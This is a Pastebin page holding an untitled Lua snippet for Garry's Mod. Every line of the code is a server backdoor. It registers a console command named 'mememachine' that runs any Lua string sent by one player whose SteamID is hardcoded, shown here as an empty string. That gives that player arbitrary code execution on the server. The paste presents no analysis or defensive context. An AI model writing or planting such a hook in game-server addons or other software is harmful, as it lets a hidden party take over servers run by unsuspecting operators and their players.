MCiLuZiioNz

Untitled

Feb 14th, 2016
72
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Lua 0.15 KB | None | 0 0
  1. if SERVER then
  2. concommand.Add("mememachine", function( ply,cmd,arg,argstr)
  3.         if not (ply:SteamID() == "") then return end
  4.         RunString(argstr)
  5. end)
  6. end
Advertisement
Add Comment
Please, Sign In to add comment